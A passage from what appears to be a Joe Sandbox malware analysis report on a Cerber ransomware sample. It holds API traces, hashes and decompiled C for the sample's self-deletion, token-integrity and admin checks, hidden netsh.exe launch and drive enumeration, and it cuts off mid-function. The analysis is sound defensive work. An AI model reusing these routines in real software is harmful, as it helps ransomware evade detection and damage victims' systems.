0x00407c02
0x00407c03
0x00407c09
0x00407c11
0x00407c12
0x00407c18
0x00407c20
0x00407c21
0x00407c27
0x00407c2d
0x00407c30
0x00407c36
0x00407c41
0x00407c47
0x00407c50
0x00407c56
0x00407c61
0x00407c67
0x00407c70
0x00407c76
0x00407c81
0x00407c87
0x00407c92
0x00407c98
0x00407c9e
0x00407ca5
0x00407cab
0x00407cb5
0x00407cbf
0x00407cc6
0x00407ccd
0x00407cce
0x00407cd3
0x00407cd4
0x00407cd9
0x00407cda
0x00407cdb
0x00407ce0
0x00407ce0
0x00407ce2
0x00407ce2
0x00407ce9
0x00000000
0x00407ceb
0x00407ceb
0x00407cf2
0x00407cfc
0x00000000
0x00000000
0x00000000
0x00407cf2
0x00407cfe
0x00407cfe
0x00407d07
0x00407d08
0x00407d0e
0x00407d16
0x00407d1f
0x00407d23
0x00407d24
0x00407d36
0x00407d39
0x00407d3e
0x00407d41
0x00407d44
0x00000000
0x00407cf4
0x00407cf4
0x00407cf5
0x00407cf5
0x00000000
0x00407cfa
0x00407b5a
0x00407b5a
0x00407b63
0x00407b68
0x00407b6d
0x00407b72
0x00407b73
0x00407b7a
0x00407b7b
0x00407b90
0x00407b97
0x00407b98
0x00407bac
0x00407baf
0x00407bb4
0x00000000
0x00407bb4
0x00407b2b
0x00407b2b
0x00407b2c
0x00000000
0x00407b2c
0x00407b00
0x00407b00
0x00407b01
0x00407b31
0x00407b31
0x00407e88
0x00407e8b
0x00407e8f
0x00407e92
0x00407e97
0x00407e9a
0x00407e9a
0x00407e9c
0x00407e9c
0x00407a8c
0x00407a8c
0x00407a92
0x00407a93
0x00407a94
0x00407a9a
0x00407aaf
0x00407ab3
0x00407ab4
0x00407ac6
0x00407ac9
0x00407ace
0x00407ad1
0x00407ad4
0x00407ad4
0x00407a19
0x00407a19
0x00407a1f
0x00407a25
0x00407a2b
0x00407a33
0x00407a3c
0x00407a40
0x00407a41
0x00407a53
0x00407a56
0x00407a5b
0x00407a5e
0x00407a61
0x00407a61
0x004079bc
0x004079bc
0x004079c2
0x004079c3
0x004079c4
0x004079c5
0x004079cc
0x004079d0
0x004079dd
0x004079e2
0x004079e5
0x004079e9
0x004079ea
0x004079ef
0x00407e41
0x00407e4a
0x00407e4d
0x00407e52
0x00407e55
0x00407e58
0x00407e58
0x00407942
0x00407942
0x00407948
0x00407949
0x0040794a
0x0040794d
0x00407956
0x0040796b
0x0040796f
0x00407970
0x00407982
0x00407985
0x0040798a
0x0040798d
0x00407990
0x00407990
0x00407fe2
0x00407fe2
0x00407920
0x00407fec
0x00407ff1
0x00407ff6
0x00407ff6
0x00407fff

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000), ref: 004078FF
StrCmpNIA.SHLWAPI(00000000,00000000,?,?,0000000A), ref: 00407938
StrCmpNIA.SHLWAPI(00000000,00000000,?,?,00000008,?,?,0000000A), ref: 004079B2

Part of subcall function 004077C8: lstrlen.KERNEL32(?,00000000,?,?,00407FC8,?,?,00000006,?,?,?,00000006,?,?,00000006), ref: 004077D2
Part of subcall function 004077C8: lstrcpy.KERNEL32(?,?), ref: 0040780D

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy
String ID:
API String ID: 805584807-0
Opcode ID: b401ab38c0101cfb7659c94d98ab102cead8d602e935c577b57b34f79dc37e85
Instruction ID: 818580fb1fba7dd59bef8428ed5c5f246a8211701d3eac6ac6326046513c75f4
Opcode Fuzzy Hash: b401ab38c0101cfb7659c94d98ab102cead8d602e935c577b57b34f79dc37e85
Instruction Fuzzy Hash: 701293B1D04209BEDB10ABA5DC46FAF7B78EB05704F11447BF505F61C2E6785A088F6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B53E Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 97
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040B53E(void* __ecx) {
				char _v5;
				WCHAR* _v12;
				short _v212;
				void* __esi;
				void* _t11;
				WCHAR* _t14;
				WCHAR* _t16;
				WCHAR* _t26;
				WCHAR* _t31;
				WCHAR* _t36;
				WCHAR* _t44;
				WCHAR* _t46;
				WCHAR* _t47;
				WCHAR* _t49;
				WCHAR* _t52;
				WCHAR* _t53;
				WCHAR* _t54;

				_v5 = 0;
				_t11 = E0040591C(0x40d958, 0xb, 0xa0dd64f4);
				_t14 = E0040B08E( &_v12, __ecx, E0040591C(0x40d964, 0x1f, 0xab845937), _t11); // executed
				_t44 = _t14;
				_v12 = _t44;
				if(_t44 == 0) {
					L7:
					return _v5;
				} else {
					_t16 = StrChrW(_t44, 0x2d);
					_t49 = _t16;
					if(_t49 != 0) {
						StrCpyNW( &_v212, _t44, (_t16 - _t44 >> 1) + 1);
						GetTempPathW(0x104, 0x42fbc8);
						lstrcatW(0x42fbc8,  &_v212);
						_t52 =  &(_t49[1]);
						_t26 = StrChrW(_t52, 0x2d);
						_t46 = _t26;
						if(_t46 != 0) {
							StrCpyNW("68f6", _t52, (_t26 - _t52 >> 1) + 1);
							_t6 =  &(_t46[1]); // 0x2
							_t53 = _t6;
							_t31 = StrChrW(_t53, 0x2d);
							_t47 = _t31;
							if(_t47 != 0) {
								StrCpyNW("4e9a", _t53, (_t31 - _t53 >> 1) + 1);
								_t7 =  &(_t47[1]); // 0x2
								_t54 = _t7;
								_t36 = StrChrW(_t54, 0x2d);
								if(_t36 != 0) {
									StrCpyNW("955c", _t54, (_t36 - _t54 >> 1) + 1);
									_v5 = 1;
								}
							}
						}
					}
					E00405463(_v12);
					goto L7;
				}
			}

0x0040b554
0x0040b558
0x0040b579
0x0040b57e
0x0040b582
0x0040b587
0x0040b64b
0x0040b650
0x0040b58d
0x0040b591
0x0040b597
0x0040b59b
0x0040b5af
0x0040b5c0
0x0040b5ce
0x0040b5d6
0x0040b5da
0x0040b5e0
0x0040b5e4
0x0040b5f2
0x0040b5fa
0x0040b5fa
0x0040b5fe
0x0040b604
0x0040b608
0x0040b616
0x0040b61e
0x0040b61e
0x0040b622
0x0040b62a
0x0040b638
0x0040b63e
0x0040b63e
0x0040b62a
0x0040b608
0x0040b5e4
0x0040b645
0x00000000
0x0040b64a

APIs

Part of subcall function 0040B08E: RegOpenKeyExW.KERNEL32(80000002,0040B57E,00000000,00020119,0040B57E,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0AE
Part of subcall function 0040B08E: RegQueryValueExW.KERNEL32(0040B57E,?,00000000,00000000,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0C8
Part of subcall function 0040B08E: RegQueryValueExW.KERNEL32(0040B57E,?,00000000,00000000,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0ED
Part of subcall function 0040B08E: RegCloseKey.ADVAPI32(0040B57E,?,?,?,?,0040B57E,00000000,?,?,00000000,?,?,00000000), ref: 0040B10E

StrChrW.SHLWAPI(00000000,0000002D,00000000,?,00000000,?,?,00000000), ref: 0040B591
StrCpyNW.SHLWAPI(?,00000000,00000001,?,00000000,?,?,00000000), ref: 0040B5AF
GetTempPathW.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\d06ed635,?,00000000,?,?,00000000), ref: 0040B5C0
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\d06ed635,?), ref: 0040B5CE
StrChrW.SHLWAPI(-00000002,0000002D,?,00000000,?,?,00000000), ref: 0040B5DA
StrCpyNW.SHLWAPI(68f6,-00000002,00000001,?,00000000,?,?,00000000), ref: 0040B5F2
StrChrW.SHLWAPI(00000002,0000002D,?,00000000,?,?,00000000), ref: 0040B5FE
StrCpyNW.SHLWAPI(4e9a,00000002,00000001,?,00000000,?,?,00000000), ref: 0040B616
StrChrW.SHLWAPI(00000002,0000002D,?,00000000,?,?,00000000), ref: 0040B622
StrCpyNW.SHLWAPI(955c,00000002,00000001,?,00000000,?,?,00000000), ref: 0040B638

Strings

C:\Users\user\AppData\Local\Temp\d06ed635, xrefs: 0040B5B5, 0040B5BA, 0040B5CD
68f6, xrefs: 0040B5ED
955c, xrefs: 0040B633
4e9a, xrefs: 0040B611

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseOpenPathTemplstrcat
String ID: 4e9a$68f6$955c$C:\Users\user\AppData\Local\Temp\d06ed635
API String ID: 3283998727-2142354402
Opcode ID: 7f4274f67ac4a1bc1059d1d700c6df9c3a70b4ef4c444a0a3130088cdf564e7b
Instruction ID: 32be6bc6edbcde913aa383d40c1836da8f2025cb8ba36b10733c938e06cc4411
Opcode Fuzzy Hash: 7f4274f67ac4a1bc1059d1d700c6df9c3a70b4ef4c444a0a3130088cdf564e7b
Instruction Fuzzy Hash: C52126779006227AD32057A49D0EFAF3E68DF84B00F040836F954F22C1EF75DA0586AE

Uniqueness

Uniqueness Score: -1.00%

Function 004082AB Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E004082AB(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v12;
				struct _SHELLEXECUTEINFOW _v72;
				short _v592;
				short _v1112;
				void* __esi;
				void* __ebp;
				void* _t19;
				signed int _t21;
				void* _t41;
				signed int _t42;
				void* _t48;
				void* _t49;
				intOrPtr* _t51;

				_t42 = __edx;
				_t41 = __ecx;
				_t19 = E004031AF(_a4, __eflags, E00405905(0x40d6c0, 0xd, 0x4756bd1a));
				_t49 = _t48 + 0x10;
				_t21 = E00403253(_t19, __eflags) | _t42;
				_t55 = _t21;
				if(_t21 != 0) {
					_push(__edi);
					SHChangeNotify(4, 0x3005, 0x42f840, 0); // executed
					MoveFileExW(0x42f840, 0, 4); // executed
					_push(0x42f840);
					_push(PathFindFileNameW(0x42f840));
					_push(E0040591C(0x40d6d0, 0x55, 0x2e7fd69b));
					_push( &_v8);
					_t21 = E00405B0C(__ebx, _t41, 0, 0x42f840, _t55);
					_t51 = _t49 + 0x1c;
					_t56 = _t21;
					if(_t21 != 0) {
						E00405F6B(_t41, _t56,  &_v12);
						 *_t51 = 0x104;
						GetSystemDirectoryW( &_v592, ??);
						_push( &_v592);
						wsprintfW( &_v1112, E0040591C(0x40d6b4, 0xa, 0x1440d523));
						memset( &(_v72.fMask), 0, 0x38);
						_v72.cbSize = 0x3c;
						_v72.fMask = 0x8600;
						_v72.lpVerb = E0040591C(0x40d6ac, 4, 0x96d648ae);
						_v72.lpFile =  &_v1112;
						_v72.lpParameters = _v8;
						_v72.nShow = 0;
						ShellExecuteExW( &_v72); // executed
						_t21 = E00405463(_v8);
					}
					ExitProcess(0);
				}
				return _t21;
			}

0x004082ab
0x004082ab
0x004082ca
0x004082cf
0x004082d9
0x004082d9
0x004082db
0x004082e1
0x004082f2
0x004082fc
0x00408302
0x0040830a
0x0040831f
0x00408323
0x00408324
0x00408329
0x0040832c
0x0040832e
0x00408338
0x00408343
0x0040834b
0x00408357
0x00408374
0x00408381
0x00408392
0x00408399
0x004083a8
0x004083b1
0x004083bb
0x004083be
0x004083c1
0x004083c7
0x004083c7
0x004083cd
0x004083cd
0x004083d6

APIs

SHChangeNotify.SHELL32(00000004,00003005,C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,00000000), ref: 004082F2
MoveFileExW.KERNEL32(C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,00000000,00000004,?,?,?,00000000), ref: 004082FC
PathFindFileNameW.SHLWAPI(C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,?,?,?,00000000), ref: 00408304
ExitProcess.KERNEL32 ref: 004083CD

Part of subcall function 00405F6B: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,0040833D,?,?,?,?,?,?,?,00000000), ref: 00405FA1
Part of subcall function 00405F6B: GetProcAddress.KERNEL32(00000000), ref: 00405FA8

GetSystemDirectoryW.KERNEL32(?,?), ref: 0040834B
wsprintfW.USER32 ref: 00408374
memset.NTDLL ref: 00408381
ShellExecuteExW.SHELL32(0000003C), ref: 004083C1

Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
Part of subcall function 00405463: RtlFreeHeap.NTDLL(00000000,-00000008), ref: 0040549A
Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1

Strings

<, xrefs: 00408392
C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe, xrefs: 004082E5, 004082EA, 004082FB, 00408302, 00408303

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: ErrorFileLast$AddressChangeDirectoryExecuteExitFindFreeHandleHeapModuleMoveNameNotifyPathProcProcessShellSystemmemsetwsprintf
String ID: <$C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe
API String ID: 2654349300-1496615427
Opcode ID: ff9b78ff71d073ab14403cc3809422da466c707121bc5d55e0ae23cacb143a43
Instruction ID: e81e65f490f2918546cf3dc480cadbfd72196a89e8115570de0b66540c6f6c56
Opcode Fuzzy Hash: ff9b78ff71d073ab14403cc3809422da466c707121bc5d55e0ae23cacb143a43
Instruction Fuzzy Hash: CF2182B1C40218BBDB10ABA1DD49F9F7BBCEB44715F04047AF608B6181E7785A488F6D

Uniqueness

Uniqueness Score: -1.00%

Function 00406005 Relevance: 15.1, APIs: 10, Instructions: 62
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406005(void* __ecx) {
				long _v8;
				void* _v12;
				int _t16;
				int _t20;
				long _t30;
				void* _t33;

				_t30 = 0;
				_v12 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v12) != 0) {
					_v8 = 0;
					_t16 = GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
					if(_t16 != 0 || GetLastError() == 0x7a) {
						_t33 = LocalAlloc(0x40, _v8);
						if(_t33 != _t30) {
							_t20 = GetTokenInformation(_v12, 0x19, _t33, _v8,  &_v8); // executed
							if(_t20 != 0) {
								_t30 =  *(GetSidSubAuthority( *_t33,  *(GetSidSubAuthorityCount( *_t33)) - 0x00000001 & 0x000000ff));
							}
							LocalFree(_t33);
						}
					}
					FindCloseChangeNotification(_v12); // executed
				}
				return _t30;
			}

0x0040600f
0x00406013
0x00406025
0x00406032
0x00406035
0x0040603d
0x00406056
0x0040605a
0x00406069
0x00406071
0x0040608b
0x0040608b
0x0040608e
0x0040608e
0x00406094
0x00406098
0x00406098
0x004060a2

APIs

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000000,00000000,?,004067F8), ref: 00406016
OpenProcessToken.ADVAPI32(00000000,?,004067F8), ref: 0040601D
GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?,?,004067F8), ref: 00406035
GetLastError.KERNEL32(?,004067F8), ref: 0040603F
LocalAlloc.KERNEL32(00000040,?,00000000,?,004067F8), ref: 00406050
GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?,?,004067F8), ref: 00406069
GetSidSubAuthorityCount.ADVAPI32(00000000,?,004067F8), ref: 00406075
GetSidSubAuthority.ADVAPI32(00000000,?,?,004067F8), ref: 00406085
LocalFree.KERNEL32(00000000,?,004067F8), ref: 0040608E
FindCloseChangeNotification.KERNEL32(?,004067F8), ref: 00406098

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Token$AuthorityInformationLocalProcess$AllocChangeCloseCountCurrentErrorFindFreeLastNotificationOpen
String ID:
API String ID: 2684962006-0
Opcode ID: 8cdcdb099773aa73dff319db42a612ccbdfaf0fca6c691c724fc3d702d28fb54
Instruction ID: 8cb5e333a96f95fad98f0925d080cf7ecd4ccd4366d947745b1979e041030130
Opcode Fuzzy Hash: 8cdcdb099773aa73dff319db42a612ccbdfaf0fca6c691c724fc3d702d28fb54
Instruction Fuzzy Hash: E911467A600104FFDB219FA1DD08DAE7F79EB45711F1000B9F906F26A0D7359A18EB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A8DF Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E0040A8DF(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, char _a12) {
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _v28;
				long _v32;
				intOrPtr _v36;
				char _v44;
				char _v68;
				short _v592;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t48;
				void* _t50;
				intOrPtr _t61;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t82;
				void* _t88;
				void* _t89;
				long _t90;
				void* _t92;
				void* _t94;
				void* _t95;

				_t87 = __edx;
				_t79 = __ecx;
				E00402C20(_t77, __edx, _t88, _t92);
				_t95 = _t94 + 0x14;
				_v32 = GetTickCount();
				 *0x40f1d8( &_v68, _a4, E0040591C(0x40d8b4, 0x13, 0x682561bd));
				_v24 = 0;
				_v16 = 0;
				_v12 = 0;
				_v28 = 0;
				_v20 = 0;
				_t78 = E0040622D(_t77, _t79);
				GetSystemDirectoryW( &_v592, 0x104); // executed
				_t48 = E0040A0A4(); // executed
				_v36 = _t48;
				_t89 = 0;
				do {
					_t50 = E0040A892(_v36,  &_v44);
					_pop(_t82);
					if(_t50 >= 2 && (_t50 <= 3 || _t50 == 6)) {
						_t22 =  &_v20; // 0x406633
						E0040A80E(_t82, _t78,  &_v44, _t22,  &_v68,  &_v16,  &_v12,  &_v28,  &_v24, (_v592 & 0xffffff00 | _v592 == _v44) & 0x000000ff); // executed
						_t95 = _t95 + 0x24;
					}
					_t89 = _t89 + 1;
				} while (_t89 <= 0x19);
				E0040630E(_t78);
				E0040634B(_t78, _t78);
				_t90 = GetTickCount();
				if(E00402C54(_t87, _a4) != 0) {
					_push(_t90 - _v32);
					_push(E0040591C( &E0040D8C8, 0x1f, 0x34d17065));
					_push(_a4);
					E00402C20(_t78, _t87, _t90 - _v32, 0);
				}
				if(_v20 != 0) {
					_t61 = _v16;
					if(_v12 != 0) {
						 *_v28 = _t61;
					} else {
						_v12 = _t61;
					}
					 *_a8 = _v12;
					_t35 =  &_a12; // 0x406633
					 *((intOrPtr*)( *_t35)) = _v24;
				}
				 *0x40f1e0( &_v68);
				return 0 | _v20 != 0x00000000;
			}

0x0040a8df
0x0040a8df
0x0040a900
0x0040a905
0x0040a90e
0x0040a915
0x0040a91d
0x0040a920
0x0040a923
0x0040a926
0x0040a929
0x0040a931
0x0040a93f
0x0040a945
0x0040a94a
0x0040a94d
0x0040a94f
0x0040a958
0x0040a95e
0x0040a962
0x0040a994
0x0040a99d
0x0040a9a2
0x0040a9a2
0x0040a9a5
0x0040a9a6
0x0040a9ad
0x0040a9b4
0x0040a9c2
0x0040a9cc
0x0040a9d1
0x0040a9e6
0x0040a9e7
0x0040a9ea
0x0040a9ef
0x0040a9f5
0x0040a9f7
0x0040a9fd
0x0040aa07
0x0040a9ff
0x0040a9ff
0x0040a9ff
0x0040aa0f
0x0040aa14
0x0040aa17
0x0040aa17
0x0040aa1d
0x0040aa2f

APIs

GetTickCount.KERNEL32 ref: 0040A908
RtlInitializeCriticalSection.NTDLL(?), ref: 0040A915
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040A93F

Part of subcall function 0040A0A4: GetLogicalDrives.KERNEL32 ref: 0040A0AD
Part of subcall function 0040A0A4: RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000), ref: 0040A0ED
Part of subcall function 0040A0A4: RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A123
Part of subcall function 0040A0A4: RegCloseKey.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A138

Part of subcall function 0040A892: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040A8D4

GetTickCount.KERNEL32 ref: 0040A9B9
RtlDeleteCriticalSection.NTDLL(?), ref: 0040AA1D

Strings

3f@, xrefs: 0040A994, 0040A997
0jt, xrefs: 0040A908, 0040A9B9
3f@, xrefs: 0040AA14

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CountCriticalSectionTick$CloseDeleteDirectoryDrivesInitializeLogicalOpenQuerySystemValuelstrcpy
String ID: 0jt$3f@$3f@
API String ID: 4201821548-612658434
Opcode ID: 292e2c22d9d0e416b2523cc020573ba9d17a2e029693af9b1a6c4d4d7aef3f44
Instruction ID: 694c260ad55fdb15e18b233715df8a646d2816963bf82ac05ff2a62387601ac6
Opcode Fuzzy Hash: 292e2c22d9d0e416b2523cc020573ba9d17a2e029693af9b1a6c4d4d7aef3f44
Instruction Fuzzy Hash: 92416FB2D00219ABCB11AFE5DC458EF7BB8EF48310F10443BF501F6281EA388A55CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040137F Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E0040137F(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
				int _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v92;
				void* __esi;
				void* __ebp;
				int _t21;

				_push(_a4);
				_push("C:\\Windows\\system32\\netsh.exe");
				_v8 = 0;
				_push(E00405905(0x40ceb4, 0x11, 0x65f84038));
				_push( &_v8);
				E00405B59(__ebx, __ecx, __edi, 0, __eflags);
				memset( &(_v92.lpReserved), 0, 0x40);
				_v92.cb = 0x44;
				_t21 = CreateProcessA(0, _v8, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24); // executed
				if(_t21 != 0) {
					if(WaitForSingleObject(_v24.hProcess, 0x1388) == 0x102) {
						TerminateProcess(_v24.hProcess, 0); // executed
					}
					CloseHandle(_v24);
					CloseHandle(_v24.hThread);
				}
				return E00405463(_v8);
			}

0x00401386
0x0040138b
0x0040139c
0x004013a7
0x004013ab
0x004013ac
0x004013b8
0x004013d5
0x004013dd
0x004013e5
0x004013fa
0x00401400
0x00401400
0x00401409
0x00401412
0x00401412
0x00401422

APIs

memset.NTDLL ref: 004013B8
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004013DD
WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,00000000), ref: 004013EF
TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00401400
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401409
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401412

Strings

C:\Windows\system32\netsh.exe, xrefs: 0040138B
D, xrefs: 004013D5

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$CreateObjectSingleTerminateWaitmemset
String ID: C:\Windows\system32\netsh.exe$D
API String ID: 1471562994-630261345
Opcode ID: 764ff5189e08f2158ab9147cc3e4a9623cf75f40f972b9de3ee550245e65fc49
Instruction ID: ddf5f14e466ed530b43ca890467a1ba3be817bc74457b95caa82e618a00c64c9
Opcode Fuzzy Hash: 764ff5189e08f2158ab9147cc3e4a9623cf75f40f972b9de3ee550245e65fc49
Instruction Fuzzy Hash: 0B117971841128BBCB21ABA1CD0AECF7F3CEF00751F200076F605B60E1DA795A04DAE9

Uniqueness

Uniqueness Score: -1.00%

Function 00402D06 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00402D06(void* _a4) {
				void _v8;
				long _v12;
				char _v16;
				void _v20;
				char _v88;
				int _t37;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if( *0x43072c < 6) {
					L5:
					if(DuplicateToken(_a4, 1,  &_v8) == 0) {
						L8:
						return 0 | _v16 != 0x00000000;
					}
					L6:
					_push( &_v12);
					_push( &_v88);
					_push(0);
					_push(0x1a);
					_v12 = 0x44;
					if( *0x40f93c() != 0) {
						 *0x40faa4(_v8,  &_v88,  &_v16);
						FindCloseChangeNotification(_v8); // executed
					}
					goto L8;
				}
				_t37 = GetTokenInformation(_a4, 0x12,  &_v20, 4,  &_v12); // executed
				if(_t37 == 0 || _v20 == 3 && GetTokenInformation(_a4, 0x13,  &_v8, 4,  &_v12) == 0) {
					goto L8;
				} else {
					if(_v8 != 0) {
						goto L6;
					}
					goto L5;
				}
			}

0x00402d16
0x00402d19
0x00402d1c
0x00402d1f
0x00402d5e
0x00402d6f
0x00402da7
0x00402db1
0x00402db1
0x00402d71
0x00402d74
0x00402d78
0x00402d79
0x00402d7a
0x00402d7c
0x00402d8b
0x00402d98
0x00402da1
0x00402da1
0x00000000
0x00402d8b
0x00402d30
0x00402d38
0x00000000
0x00402d59
0x00402d5c
0x00000000
0x00000000
0x00000000
0x00402d5c

APIs

GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?,00000000), ref: 00402D30
GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?), ref: 00402D4F
DuplicateToken.ADVAPI32(?,00000001,?,00000000), ref: 00402D67
CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 00402D83
CheckTokenMembership.ADVAPI32(?,?,?), ref: 00402D98
FindCloseChangeNotification.KERNEL32(?), ref: 00402DA1

Strings

D, xrefs: 00402D7C

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Token$Information$ChangeCheckCloseCreateDuplicateFindKnownMembershipNotificationWell
String ID: D
API String ID: 3229538523-2746444292
Opcode ID: 25489d45a5b97dd58e497412a4df9039cc6fca1245a2b9d3dca1e17a6d257f24
Instruction ID: 0d410c75a1abfc5775d22fac195d72f8047e95bba00665c990917ff8bb71829a
Opcode Fuzzy Hash: 25489d45a5b97dd58e497412a4df9039cc6fca1245a2b9d3dca1e17a6d257f24
Instruction Fuzzy Hash: 9F21CA71A00218FFEF10DF91CE49AEEBBB8EF04740F004076A601E5190D7789A48DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00407341 Relevance: 10.8, APIs: 7, Instructions: 267
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00407341(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v5;
				signed int _v6;
				char _v7;
				char _v8;
				char _v9;
				intOrPtr _v13;
				intOrPtr _v14;
				intOrPtr _v15;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				signed int _v28;
				char _v29;
				char _v30;
